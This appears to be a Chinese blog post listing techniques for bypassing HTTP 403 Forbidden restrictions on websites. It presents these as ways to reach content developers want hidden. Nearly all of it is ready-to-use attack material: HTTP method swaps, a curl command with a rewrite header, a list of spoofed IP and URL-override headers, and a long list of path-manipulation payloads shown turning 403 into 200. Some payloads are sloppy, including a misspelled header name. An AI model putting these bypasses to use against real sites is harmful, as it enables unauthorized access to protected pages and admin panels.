403 Forbidden 是HTTP协议中的一个状态码(Status Code), 白话理解,没有权限访问此站 。该状态表示服务器处理了本次请求,但是拒绝执行该项请求 。每当发现403页面时,这意味着里面可能有一些开发者不想让我们知道的信息。这里简单讨论几种。
- 那么遇到403页面应该怎么办呢?以下我们列出几种常见的方法。
1、修改请求方法(Change requested method)
GET → POST, GET → TRACE, GET → PUT, GET → OPTION效果如下
GET /api HTTP/1.1
Response
HTTP/1.1 403
POST /api HTTP/1.1
X-Forwared-Host: 127.0.0.1
Response
HTTP/1.1 200 OK2、USing CURL
curl -i -s -k -X $'GET' -H $'Host: example.com' -H $'X-rewrite-url: admin/login' $'https://example.com/'3、向请求模块添加头信息(包括但不限于ReFerer)
ReFerer:https://xxx/auth/login
X-rewrite-url: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1效果如下
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403
GET /auth/login HTTP/1.1
X-Forwared-Host: 127.0.0.1
Response
HTTP/1.1 200 OK注:不局限于127.0.0.1,可拓宽思路,比如多个子域。可以进行FUZZ。
4、扩展名绕过(Extension bypass)
site.com/admin => 403
site.com/admin/ => 200
site.com/admin/*/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin/./. => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin?? => 200
site.com/admin%09/ => 200
site.com/admin%20/ => 200
site.com/admin/..;/ => 200
site.com/%20admin%20/ => 200© 版权声明
THE END
![表情[keai]-铭心博客](https://www.imxbk.com/wp-content/themes/zibll/img/smilies/keai.gif)
暂无评论内容